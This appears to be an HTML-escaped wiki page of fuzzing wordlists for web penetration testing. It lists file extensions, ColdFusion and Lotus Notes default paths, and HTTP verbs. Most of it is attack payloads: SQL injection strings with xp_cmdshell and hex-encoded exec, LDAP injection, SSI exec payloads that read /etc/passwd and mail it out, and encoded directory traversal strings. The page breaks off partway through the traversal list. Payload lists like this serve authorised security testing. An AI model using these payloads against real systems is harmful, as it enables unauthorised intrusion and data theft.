.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
